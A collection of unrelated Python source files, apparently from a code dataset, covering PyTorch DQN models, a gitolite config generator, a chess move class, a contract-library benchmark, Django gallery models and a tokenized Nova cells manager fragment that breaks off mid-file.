provided_scopes = set(self.auto_approve_scopes.split())
resource_scopes = set(scopes)
return resource_scopes.issubset(provided_scopes)
| StarcoderdataPython |
1711305 | import torch
import torch.nn as nn
import torch.nn.functional as F
class Flatten(nn.Module):
def forward(self, input):
return input.view(input.size(0), -1)
class DQN(nn.Module):
def __init__(self, n_action_space):
super(DQN, self).__init__()
self.s1 = nn.Sequential(
nn.Conv2d(1, 64, (1, 1)),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 128, (2, 2)),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Conv2d(128, 128, (2, 2)),
nn.BatchNorm2d(128),
nn.ReLU(),
Flatten(),
nn.Linear(512, 32),
nn.ReLU(),
)
self.act = nn.Linear(32, n_action_space)
self.act = nn.NoisyLinear(32, n_action_space)
def forward(self, x):
x = self.s1(x)
return self.act(x)
def predict(self, x):
return self.forward(x).detach().sort(dim=1, descending=True)
class Combine(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size):
super(Combine, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size) #, groups=in_channels)
self.bn = nn.BatchNorm2d(out_channels)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
return self.relu(x)
class Concat(nn.Module):
def __init__(self, in_channels, out_channels):
super(Concat, self).__init__()
self.c1 = Combine(in_channels, out_channels, (2, 1))
self.c2 = Combine(in_channels, out_channels, (1, 2))
self.flat = Flatten()
def forward(self, x):
x1 = self.flat(self.c1(x))
x2 = self.flat(self.c2(x))
return torch.cat([x1, x2], 1)
class SupervisedModel(nn.Module):
def __init__(self, n_action_space):
super(SupervisedModel, self).__init__()
self.c1 = Combine(1, 256, (2, 1))
self.c2 = Combine(1, 256, (1, 2))
self.concat1 = Concat(256, 1024)
self.concat2 = Concat(256, 1024)
self.l1 = nn.Linear(34816, 4096)
self.l2 = nn.Linear(4096, 1024)
self.l3 = nn.Linear(1024, 32)
self.act = nn.Linear(32, n_action_space)
def forward(self, x):
x1 = self.c1(x)
x2 = self.c2(x)
x1 = self.concat1(x1)
x2 = self.concat2(x2)
x = torch.cat([x1, x2], 1)
x = F.relu(self.l1(x))
x = F.relu(self.l2(x))
x = F.relu(self.l3(x))
return self.act(x)
def predict(self, x):
return self.forward(x).detach().sort(dim=1, descending=True)
def get_argmax(self, x):
return self.forward(x)[0].detach().argmax().item()
class DuelingDQN(nn.Module):
def __init__(self, n_action_space):
super(DuelingDQN, self).__init__()
self.feature = nn.Sequential(
nn.Conv2d(1, 64, (1, 1)),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 128, (2, 2)),
nn.BatchNorm2d(128),
nn.ReLU(),
nn.Conv2d(128, 128, (2, 2)),
nn.BatchNorm2d(128),
nn.ReLU(),
Flatten(),
nn.Linear(512, 128),
nn.ReLU(),
)
self.value = nn.Sequential(
nn.Linear(128, 32),
nn.ReLU(),
nn.Linear(32, 1)
)
self.advantage = nn.Sequential(
nn.Linear(128, 128),
nn.ReLU(),
nn.Linear(128, n_action_space)
)
def forward(self, x):
x = self.feature(x)
value = self.value(x)
advantage = self.advantage(x)
return value + advantage - advantage.mean()
def predict(self, x):
return self.forward(x).detach().sort(dim=1, descending=True)
class XceptionLikeDuelingDQN(nn.Module):
def __init__(self, n_action_space):
super(XceptionLikeDuelingDQN, self).__init__()
self.feature = nn.Sequential(
nn.Conv2d(1, 1024, (1, 1)),
nn.BatchNorm2d(1024),
nn.ReLU(),
XceptionLike(1024),
Flatten(),
nn.Linear(27648, 2048),
nn.ReLU(),
nn.Linear(2048, 2048),
nn.ReLU(),
nn.Linear(2048, 1024),
nn.ReLU(),
)
self.value = nn.Sequential(
nn.Linear(1024, 32),
nn.ReLU(),
nn.Linear(32, 1)
)
self.advantage = nn.Sequential(
nn.Linear(1024, 128),
nn.ReLU(),
nn.Linear(128, n_action_space)
)
def forward(self, x):
x = self.feature(x)
value = self.value(x)
advantage = self.advantage(x)
return value + advantage - advantage.mean()
def predict(self, x):
return self.forward(x).detach().sort(dim=1, descending=True)
class XceptionLike(nn.Module):
def __init__(self, in_channels):
super(XceptionLike, self).__init__()
self.branch2x2 = BasicConv2d(in_channels, 1024, kernel_size=2, groups=in_channels)
self.branch3x3 = BasicConv2d(in_channels, 1024, kernel_size=3, groups=in_channels, padding=1)
self.maxpool3x3 = nn.MaxPool2d(2, 1)
self.branch4x4 = BasicConv2d(in_channels, 1024, kernel_size=4, groups=in_channels, padding=1)
def forward(self, x):
branch2x2 = self.branch2x2(x)
branch3x3 = self.branch3x3(x)
branch3x3 = self.maxpool3x3(branch3x3)
branch4x4 = self.branch4x4(x)
outputs = [branch2x2, branch3x3, branch4x4]
return torch.cat(outputs, 1)
class BasicConv2d(nn.Module):
def __init__(self, in_channels, out_channels, **kwargs):
super(BasicConv2d, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)
self.bn = nn.BatchNorm2d(out_channels, eps=0.001)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
return F.relu(x, inplace=True)
# https://github.com/Kaixhin/Rainbow/blob/master/model.py#L9-L46
# Factorised NoisyLinear layer with bias
class NoisyLinear(nn.Module):
def __init__(self, in_features, out_features, std_init=0.4):
super(NoisyLinear, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.std_init = std_init
self.weight_mu = nn.Parameter(torch.empty(out_features, in_features))
self.weight_sigma = nn.Parameter(torch.empty(out_features, in_features))
# Notice self.weight_epsilon in `forward`
self.register_buffer('weight_epsilon', torch.empty(out_features, in_features))
self.bias_mu = nn.Parameter(torch.empty(out_features))
self.bias_sigma = nn.Parameter(torch.empty(out_features))
self.register_buffer('bias_epsilon', torch.empty(out_features))
self.reset_parameters()
self.reset_noise()
def reset_parameters(self):
mu_range = 1 / math.sqrt(self.in_features)
self.weight_mu.data.uniform_(-mu_range, mu_range)
self.weight_sigma.data.fill_(self.std_init / math.sqrt(self.in_features))
self.bias_mu.data.uniform_(-mu_range, mu_range)
self.bias_sigma.data.fill_(self.std_init / math.sqrt(self.out_features))
def _scale_noise(self, size):
x = torch.randn(size)
return x.sign().mul_(x.abs().sqrt_())
def reset_noise(self):
epsilon_in = self._scale_noise(self.in_features)
epsilon_out = self._scale_noise(self.out_features)
self.weight_epsilon.copy_(epsilon_out.ger(epsilon_in))
self.bias_epsilon.copy_(epsilon_out)
def forward(self, input):
if self.training:
return F.linear(input, self.weight_mu + self.weight_sigma * self.weight_epsilon,
self.bias_mu + self.bias_sigma * self.bias_epsilon)
else:
return F.linear(input, self.weight_mu, self.bias_mu)
| StarcoderdataPython |
1621099 | from brigitte.repositories.models import Repository
from brigitte.accounts.models import SshPublicKey
from brigitte.repositories.backends.base import ShellMixin
import os
def generate_gitolite_conf(file_path):
file_obj = open(file_path, 'w')
lines = [
'repo gitolite-admin\n',
'\tRW+ = gitolite\n',
]
def generate_access_rule(repo_user, key):
if repo_user.can_write and key.can_write:
return 'RW+'
elif repo_user.can_read and key.can_read:
return 'R'
for repo in Repository.objects.filter(repo_type='git'):
keys = []
if not repo.private:
keys.append('\tR\t= daemon\n')
for user in repo.repositoryuser_set.all():
for key in user.user.sshpublickey_set.all():
keys.append('\t%s\t= key-%s\n' % (generate_access_rule(user, key), key.pk))
if len(keys) > 0:
lines.append('\n')
lines.append('repo\t%s\n' % repo.short_path[:-4])
lines.extend(keys)
file_obj.writelines(lines)
file_obj.close()
def export_public_keys(keydir_path):
for key in os.listdir(keydir_path):
key_path = os.path.join(keydir_path, key)
if os.path.isfile(key_path) and key != 'gitolite.pub':
os.unlink(key_path)
for pubkey in SshPublicKey.objects.all():
key_obj = open(os.path.join(keydir_path, 'key-%s.pub' % pubkey.pk), 'w')
key_obj.write('%s\n' % pubkey.key)
key_obj.close()
def update_gitolite_repo(gitolite_path):
commands = [
'git add .',
'git commit -q -m updated -a',
'git push -q',
]
shell = ShellMixin()
for command in commands:
shell.exec_command(['/bin/sh', '-c', 'cd %s; %s' % (gitolite_path, command)])
| StarcoderdataPython |
185255 | from Piece import Piece, Pawn, Rook, Knight, Bishop, Queen, King
class Move(object):
"""Contains all the move methods"""
def __init__(self):
pass
def set_new_game(self):
"""
Initializes pieces for a new chess game.
Uses two for loops and if/else statements to set the pieces.
"""
board = []
A, B, C, D, E, F, G, H = range(8), range(8), range(8), range(8), range(8), range(8), range(8), range(8) # Feels unpythonic but can't do A = B = C = ... = range(8) since lists are mutable
board.extend([A, B, C, D, E, F, G, H])
for row in xrange(8):
for col in xrange(8):
if col == 1:
board[row][col] = Pawn(False, 'White')
elif col == 6:
board[row][col] = Pawn(False, 'Black')
elif col in range(2,7):
board[row][col] = Piece()
elif col == 0:
if row == 0 or row == 7:
board[row][col] = Rook(False, 'White')
elif row == 1 or row == 6:
board[row][col] = Knight(False, 'White')
elif row == 2 or row == 5:
board[row][col] = Bishop(False, 'White')
elif row == 3:
board[row][col] = Queen(False, 'White')
else:
board[row][col] = King(False, 'White')
else:
if row == 0 or row == 7:
board[row][col] = Rook(False, 'Black')
elif row == 1 or row == 6:
board[row][col] = Knight(False, 'Black')
elif row == 2 or row == 5:
board[row][col] = Bishop(False, 'Black')
elif row == 3:
board[row][col] = Queen(False, 'Black')
else:
board[row][col] = King(False, 'Black')
return board
def move(self):
"""Consolidates move methods"""
wanted = None
while wanted is None:
wanted = self.get_move()
piece = self.main_board[wanted[0][0]][wanted[0][1]]
if isinstance(piece, Pawn): # If the piece to be moved is a pawn
piece.moved = True
if abs(wanted[0][1] - wanted[1][1]) == 2: # If the pawn moved two spaces on its first move
piece.double_step = True
if isinstance(piece, Rook) or isinstance(piece, King): # Need to track for castling
piece.moved = True
self.apply_move(wanted[0], wanted[1])
def get_move(self):
"""
Prompts user for desired move. Only using board coordinates for now.
Stores from and to coordinates in tuples. Returns a tuple of these tuples."
Eg. A1 is parsed as (0, 0)
"""
piece_from = tuple(i for i in raw_input("From?"))
piece_to = tuple(i for i in raw_input("To?"))
piece_from, piece_to = self.anum_to_cart(piece_from, piece_to) # Converts user input into numbers
legal_moves = self.get_legal(piece_from)
if piece_to not in legal_moves:
print "Move is not legal. Try again."
return None
else:
location = self.cart_to_anum(piece_from)
destination = self.cart_to_anum(piece_to)
print "Moving from {0} to {1}".format(location, destination)
return (piece_from, piece_to)
def apply_move(self, location, destination):
"""Rudimentary move function for now"""
self.main_board[destination[0]][destination[1]] = self.main_board[location[0]][location[1]]
self.main_board[location[0]][location[1]] = Piece() # Makes old location empty
def get_legal(self, piece):
"""Gets list of legal moves"""
legal = self.main_board[piece[0]][piece[1]].move_set(piece, self.main_board)
return legal
def anum_to_cart(self, piece_from, piece_to):
"""
Converts board coordinate input--eg. 'A5' to cartesian coordinates.
Takes the two movement tuples, converts, then returns a single tuple
"""
atoi = {
'A' : 0,
'B' : 1,
'C' : 2,
'D' : 3,
'E' : 4,
'F' : 5,
'G' : 6,
'H' : 7
}
piece_from = (atoi[piece_from[0]], int(piece_from[1]) - 1) # -1 since counting starts from 0 not 1
piece_to = (atoi[piece_to[0]], int(piece_to[1]) - 1)
return (piece_from, piece_to)
def cart_to_anum(self, piece):
"""Converts from array coordinates to board coordinates for testing purposes"""
itoa = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']
piece = "".join((itoa[piece[0]], str(piece[1] + 1)))
return piece
| StarcoderdataPython |
38661 | #!/usr/bin/env python3
"""Benchmark icontract against deal when used together with hypothesis."""
import os
import sys
import timeit
from typing import List
import deal
import dpcontracts
import hypothesis
import hypothesis.extra.dpcontracts
import hypothesis.strategies
import icontract
import tabulate
import icontract_hypothesis
def benchmark_icontract_assume_preconditions(arg_count: int = 1) -> None:
"""Benchmark the Hypothesis testing with icontract and rejection sampling."""
count = 0
if arg_count == 1:
@icontract.require(lambda a: a > 0)
def some_func(a: int) -> None:
nonlocal count
count += 1
pass
assume_preconditions = icontract_hypothesis.make_assume_preconditions(some_func)
@hypothesis.settings(
suppress_health_check=(hypothesis.HealthCheck.filter_too_much,)
)
@hypothesis.given(a=hypothesis.strategies.integers())
def execute(a: int) -> None:
assume_preconditions(a)
some_func(a)
elif arg_count == 2:
@icontract.require(lambda a: a > 0)
@icontract.require(lambda b: b > 0)
def some_func(a: int, b: int) -> None:
nonlocal count
count += 1
pass
assume_preconditions = icontract_hypothesis.make_assume_preconditions(some_func)
@hypothesis.settings(
suppress_health_check=(hypothesis.HealthCheck.filter_too_much,)
)
@hypothesis.given(
a=hypothesis.strategies.integers(), b=hypothesis.strategies.integers()
)
def execute(a: int, b: int) -> None:
assume_preconditions(a=a, b=b)
some_func(a, b)
elif arg_count == 3:
@icontract.require(lambda a: a > 0)
@icontract.require(lambda b: b > 0)
@icontract.require(lambda c: c > 0)
def some_func(a: int, b: int, c: int) -> None:
nonlocal count
count += 1
pass
assume_preconditions = icontract_hypothesis.make_assume_preconditions(some_func)
@hypothesis.settings(
suppress_health_check=(hypothesis.HealthCheck.filter_too_much,)
)
@hypothesis.given(
a=hypothesis.strategies.integers(),
b=hypothesis.strategies.integers(),
c=hypothesis.strategies.integers(),
)
def execute(a: int, b: int, c: int) -> None:
assume_preconditions(a=a, b=b, c=c)
some_func(a, b, c)
else:
raise NotImplementedError("arg_count {}".format(arg_count))
execute()
# Assert the count of function executions for fair tests
assert count == 100
def benchmark_icontract_inferred_strategy(arg_count: int = 1) -> None:
"""Benchmark the Hypothesis testing with icontract and inferred search strategies."""
count = 0
if arg_count == 1:
@icontract.require(lambda a: a > 0)
def some_func(a: int) -> None:
nonlocal count
count += 1
pass
elif arg_count == 2:
@icontract.require(lambda a: a > 0)
@icontract.require(lambda b: b > 0)
def some_func(a: int, b: int) -> None:
nonlocal count
count += 1
pass
elif arg_count == 3:
@icontract.require(lambda a: a > 0)
@icontract.require(lambda b: b > 0)
@icontract.require(lambda c: c > 0)
def some_func(a: int, b: int, c: int) -> None:
nonlocal count
count += 1
pass
else:
raise NotImplementedError("arg_count {}".format(arg_count))
icontract_hypothesis.test_with_inferred_strategy(some_func)
# Assert the count of function executions for fair tests
assert count == 100
def benchmark_dpcontracts(arg_count: int = 1) -> None:
"""Benchmark the Hypothesis testing with dpcontracts."""
count = 0
if arg_count == 1:
@dpcontracts.require("some dummy contract", lambda args: args.a > 0)
def some_func(a: int) -> None:
nonlocal count
count += 1
pass
@hypothesis.settings(
suppress_health_check=(hypothesis.HealthCheck.filter_too_much,)
)
@hypothesis.given(a=hypothesis.strategies.integers())
def execute(a: int) -> None:
hypothesis.extra.dpcontracts.fulfill(some_func)(a)
elif arg_count == 2:
@dpcontracts.require("some dummy contract", lambda args: args.a > 0)
@dpcontracts.require("some dummy contract", lambda args: args.b > 0)
def some_func(a: int, b: int) -> None:
nonlocal count
count += 1
pass
@hypothesis.settings(
suppress_health_check=(hypothesis.HealthCheck.filter_too_much,)
)
@hypothesis.given(
a=hypothesis.strategies.integers(), b=hypothesis.strategies.integers()
)
def execute(a: int, b: int) -> None:
hypothesis.extra.dpcontracts.fulfill(some_func)(a, b)
elif arg_count == 3:
@dpcontracts.require("some dummy contract", lambda args: args.a > 0)
@dpcontracts.require("some dummy contract", lambda args: args.b > 0)
@dpcontracts.require("some dummy contract", lambda args: args.c > 0)
def some_func(a: int, b: int, c: int) -> None:
nonlocal count
count += 1
pass
@hypothesis.settings(
suppress_health_check=(hypothesis.HealthCheck.filter_too_much,)
)
@hypothesis.given(
a=hypothesis.strategies.integers(),
b=hypothesis.strategies.integers(),
c=hypothesis.strategies.integers(),
)
def execute(a: int, b: int, c: int) -> None:
hypothesis.extra.dpcontracts.fulfill(some_func)(a, b, c)
else:
raise NotImplementedError("arg_count {}".format(arg_count))
execute()
# Assert the count of function executions for fair tests
assert count == 100
def benchmark_deal(arg_count: int = 1) -> None:
"""Benchmark the Hypothesis testing with deal."""
count = 0
if arg_count == 1:
@deal.pre(lambda _: _.a > 0)
def some_func(a: int) -> None:
nonlocal count
count += 1
pass
for case in deal.cases(some_func, count=100):
case()
elif arg_count == 2:
@deal.pre(lambda _: _.a > 0)
@deal.pre(lambda _: _.b > 0)
def some_func(a: int, b: int) -> None:
nonlocal count
count += 1
pass
for case in deal.cases(some_func, count=100):
case()
elif arg_count == 3:
@deal.pre(lambda _: _.a > 0)
@deal.pre(lambda _: _.b > 0)
@deal.pre(lambda _: _.c > 0)
def some_func(a: int, b: int, c: int) -> None:
nonlocal count
count += 1
pass
for case in deal.cases(some_func, count=100):
case()
else:
raise NotImplementedError("arg_count {}".format(arg_count))
assert count == 100
def writeln_utf8(text: str = "") -> None:
"""
Write the text to STDOUT using UTF-8 encoding followed by a new-line character.
We can not use ``print()`` as we can not rely on the correct encoding in Windows.
See: https://stackoverflow.com/questions/31469707/changing-the-locale-preferred-encoding-in-python-3-in-windows
"""
sys.stdout.buffer.write(text.encode("utf-8"))
sys.stdout.buffer.write(os.linesep.encode("utf-8"))
def measure_functions() -> None:
# yapf: disable
funcs = [
'benchmark_icontract_inferred_strategy',
'benchmark_icontract_assume_preconditions',
'benchmark_dpcontracts',
'benchmark_deal',
]
# yapf: enable
durations = [0.0] * len(funcs)
number = 10
for arg_count in [1, 2, 3]:
for i, func in enumerate(funcs):
duration = timeit.timeit(
"{}(arg_count={})".format(func, arg_count),
setup="from __main__ import {}".format(func),
number=number,
)
durations[i] = duration
table = [] # type: List[List[str]]
for func, duration in zip(funcs, durations):
# yapf: disable
table.append([
'`{}`'.format(func),
'{:.2f} s'.format(duration),
'{:.2f} ms'.format(duration * 1000 / number),
'{:.0f}%'.format(duration * 100 / durations[0])
])
# yapf: enable
# yapf: disable
table_str = tabulate.tabulate(
table,
headers=['Case', 'Total time', 'Time per run', 'Relative time per run'],
colalign=('left', 'right', 'right', 'right'),
tablefmt='rst')
# yapf: enable
writeln_utf8()
writeln_utf8("Argument count: {}".format(arg_count))
writeln_utf8()
writeln_utf8(table_str)
if __name__ == "__main__":
writeln_utf8("Benchmarking Hypothesis testing:")
writeln_utf8("")
measure_functions()
| StarcoderdataPython |
1794796 | from django.db import models
# Create your models here.
class Location(models.Model):
location_name = models.CharField(max_length = 25)
def __str__(self):
return self.location_name
def save_location(self):
self.save()
def delete_location(location_id):
Location.objects.filter(id = location_id).delete()
def update_location(location_id, location):
Location.objects.filter(id = location_id).update(location_name = location)
class Category(models.Model):
category_name = models.CharField(max_length = 50)
def __str__(self):
return self.category_name
def save_category(self):
self.save()
def delete_category(category_id):
Category.objects.filter(id = category_id).delete()
def update_category(category_id, category):
Category.objects.filter(id = category_id).update(category_name = category)
class Photographer(models.Model):
names = models.CharField(max_length = 50)
email = models.EmailField(blank = True)
ig = models.CharField(max_length = 20, blank = True)
phone_number = models.CharField(max_length = 10,blank =True)
def __str__(self):
return self.names
def save_photographer(self):
self.save()
def delete_photographer(photographer_id):
Photographer.objects.filter(id = photographer_id).delete()
class Image(models.Model):
image_path = models.ImageField(upload_to = 'images/')
name = models.CharField(max_length = 50)
description = models.TextField(blank = True)
location = models.ForeignKey(Location, blank=True)
category = models.ForeignKey(Category, blank=True)
photographer = models.ForeignKey(Photographer)
def __str__(self):
return self.name
def save_image(self):
self.save()
def delete_image(image_id):
Image.objects.filter(id = image_id).delete()
def update_image(image_id, path):
Image.objects.filter(id = image_id).update(image_path = path)
def get_image_by_id(image_id):
image = Image.objects.get(pk = image_id)
return image
@classmethod
def search_image(cls, search_category):
images = cls.objects.filter(category__category_name__icontains=search_category)
return images
@classmethod
def filter_by_location(cls):
images = cls.objects.order_by('location')
return images
class Meta:
ordering = ['name']
| StarcoderdataPython |
3277683 | begin_unit
comment|'# Copyright (c) 2012 Rackspace Hosting'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
string|'"""\nCells Service Manager\n"""'
newline|'\n'
name|'import'
name|'datetime'
newline|'\n'
name|'import'
name|'time'
newline|'\n'
nl|'\n'
name|'from'
name|'oslo_log'
name|'import'
name|'log'
name|'as'
name|'logging'
newline|'\n'
name|'import'
name|'oslo_messaging'
newline|'\n'
name|'from'
name|'oslo_service'
name|'import'
name|'periodic_task'
newline|'\n'
name|'from'
name|'oslo_utils'
name|'import'
name|'importutils'
newline|'\n'
name|'from'
name|'oslo_utils'
name|'import'
name|'timeutils'
newline|'\n'
name|'import'
name|'six'
newline|'\n'
name|'from'
name|'six'
op|'.'
name|'moves'
name|'import'
name|'range'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
op|'.'
name|'cells'
name|'import'
name|'messaging'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'cells'
name|'import'
name|'state'
name|'as'
name|'cells_state'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'cells'
name|'import'
name|'utils'
name|'as'
name|'cells_utils'
newline|'\n'
name|'import'
name|'nova'
op|'.'
name|'conf'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'context'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'i18n'
name|'import'
name|'_LW'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'manager'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'objects'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'objects'
name|'import'
name|'base'
name|'as'
name|'base_obj'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'objects'
name|'import'
name|'instance'
name|'as'
name|'instance_obj'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|variable|CONF
name|'CONF'
op|'='
name|'nova'
op|'.'
name|'conf'
op|'.'
name|'CONF'
newline|'\n'
nl|'\n'
DECL|variable|LOG
name|'LOG'
op|'='
name|'logging'
op|'.'
name|'getLogger'
op|'('
name|'__name__'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|CellsManager
name|'class'
name|'CellsManager'
op|'('
name|'manager'
op|'.'
name|'Manager'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""The nova-cells manager class. This class defines RPC\n methods that the local cell may call. This class is NOT used for\n messages coming from other cells. That communication is\n driver-specific.\n\n Communication to other cells happens via the nova.cells.messaging module.\n The MessageRunner from that module will handle routing the message to\n the correct cell via the communications driver. Most methods below\n create \'targeted\' (where we want to route a message to a specific cell)\n or \'broadcast\' (where we want a message to go to multiple cells)\n messages.\n\n Scheduling requests get passed to the scheduler class.\n """'
newline|'\n'
nl|'\n'
DECL|variable|target
name|'target'
op|'='
name|'oslo_messaging'
op|'.'
name|'Target'
op|'('
name|'version'
op|'='
string|"'1.37'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|__init__
name|'def'
name|'__init__'
op|'('
name|'self'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'LOG'
op|'.'
name|'warning'
op|'('
name|'_LW'
op|'('
string|"'The cells feature of Nova is considered experimental '"
nl|'\n'
string|"'by the OpenStack project because it receives much '"
nl|'\n'
string|"'less testing than the rest of Nova. This may change '"
nl|'\n'
string|"'in the future, but current deployers should be aware '"
nl|'\n'
string|"'that the use of it in production right now may be '"
nl|'\n'
string|"'risky. Also note that cells does not currently '"
nl|'\n'
string|"'support rolling upgrades, it is assumed that cells '"
nl|'\n'
string|"'deployments are upgraded lockstep so n-1 cells '"
nl|'\n'
string|"'compatibility does not work.'"
op|')'
op|')'
newline|'\n'
comment|'# Mostly for tests.'
nl|'\n'
name|'cell_state_manager'
op|'='
name|'kwargs'
op|'.'
name|'pop'
op|'('
string|"'cell_state_manager'"
op|','
name|'None'
op|')'
newline|'\n'
name|'super'
op|'('
name|'CellsManager'
op|','
name|'self'
op|')'
op|'.'
name|'__init__'
op|'('
name|'service_name'
op|'='
string|"'cells'"
op|','
nl|'\n'
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
newline|'\n'
name|'if'
name|'cell_state_manager'
name|'is'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'cell_state_manager'
op|'='
name|'cells_state'
op|'.'
name|'CellStateManager'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'state_manager'
op|'='
name|'cell_state_manager'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'='
name|'messaging'
op|'.'
name|'MessageRunner'
op|'('
name|'self'
op|'.'
name|'state_manager'
op|')'
newline|'\n'
name|'cells_driver_cls'
op|'='
name|'importutils'
op|'.'
name|'import_class'
op|'('
nl|'\n'
name|'CONF'
op|'.'
name|'cells'
op|'.'
name|'driver'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'driver'
op|'='
name|'cells_driver_cls'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'instances_to_heal'
op|'='
name|'iter'
op|'('
op|'['
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|post_start_hook
dedent|''
name|'def'
name|'post_start_hook'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Have the driver start its servers for inter-cell communication.\n Also ask our child cells for their capacities and capabilities so\n we get them more quickly than just waiting for the next periodic\n update. Receiving the updates from the children will cause us to\n update our parents. If we don\'t have any children, just update\n our parents immediately.\n """'
newline|'\n'
comment|"# FIXME(comstud): There's currently no hooks when services are"
nl|'\n'
comment|'# stopping, so we have no way to stop servers cleanly.'
nl|'\n'
name|'self'
op|'.'
name|'driver'
op|'.'
name|'start_servers'
op|'('
name|'self'
op|'.'
name|'msg_runner'
op|')'
newline|'\n'
name|'ctxt'
op|'='
name|'context'
op|'.'
name|'get_admin_context'
op|'('
op|')'
newline|'\n'
name|'if'
name|'self'
op|'.'
name|'state_manager'
op|'.'
name|'get_child_cells'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'ask_children_for_capabilities'
op|'('
name|'ctxt'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'ask_children_for_capacities'
op|'('
name|'ctxt'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_update_our_parents'
op|'('
name|'ctxt'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'periodic_task'
op|'.'
name|'periodic_task'
newline|'\n'
DECL|member|_update_our_parents
name|'def'
name|'_update_our_parents'
op|'('
name|'self'
op|','
name|'ctxt'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Update our parent cells with our capabilities and capacity\n if we\'re at the bottom of the tree.\n """'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'tell_parents_our_capabilities'
op|'('
name|'ctxt'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'msg_runner'
op|'.'
name|'tell_parents_our_capacities'
op|'('
name|'ctxt'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'periodic_task'
op|'.'
name|'periodic_task'
newline|'\n'
DECL|member|_heal_instances
name|'def'
name|'_heal_instances'
op|'('
name|'self'
op|','
name|'ctxt'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Periodic task to send updates for a number of instances to\n parent cells.\n\n On every run of the periodic task, we will attempt to sync\n \'CONF.cells.instance_update_num_instances\' number of instances.\n When we get the list of instances, we shuffle them so that multiple\n nova-cells services aren\'t attempting to sync the same instances\n in lockstep.\n\n If CONF.cells.instance_update_at_threshold is set, only attempt\n to sync instances that have been updated recently. The CONF\n setting defines the maximum number of seconds old the updated_at\n can be. Ie, a threshold of 3600 means to only update instances\n that have modified in the last hour.\n """'
newline|'\n'
nl|'\n'
name|'if'
name|'not'
name|'self'
op|'.'
name|'state_manager'
op|'.'
name|'get_parent_cells'
op|'('
op|')'
op|':'
newline|'\n'
comment|'# No need to sync up if we have no parents.'
nl|'\n'
indent|' '
name|'return'
newline|'\n'
nl|'\n'
dedent|''
name|'info'
op|'='
op|'{'
string|"'updated_list'"
op|':'
name|'False'
op|'}'
newline|'\n'
nl|'\n'
DECL|function|_next_instance
name|'def'
name|'_next_instance'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'try'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'next'
op|'('
name|'self'
op|'.'
name|'instances_to_heal'
op|')'
newline|'\n'
dedent|''
name|'except'
name|'StopIteration'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'info'
op|'['
string|"'updated_list'"
op|']'
op|':'
newline|'\n'
indent|' '
name|'return'
newline|'\n'
dedent|''
name|'threshold'
op|'='
name|'CONF'
op|'.'
name|'cells'
op|'.'
name|'instance_updated_at_threshold'
newline|'\n'
name|'updated_since'
op|'='
name|'None'
newline|'\n'
name|'if'
name|'threshold'
op|'>'
number|'0'
op|':'
newline|'\n'
indent|' '
name|'updated_since'
op|'='
name|'timeutils'
op|'.'
name|'utcnow'
op|'('
op|')'
op|'-'
name|'datetime'
op|'.'
name|'timedelta'
op|'('
nl|'\n'
name|'seconds'
op|'='
name|'threshold'
op|')'
newline|'\n'
dedent|''
name|'self'
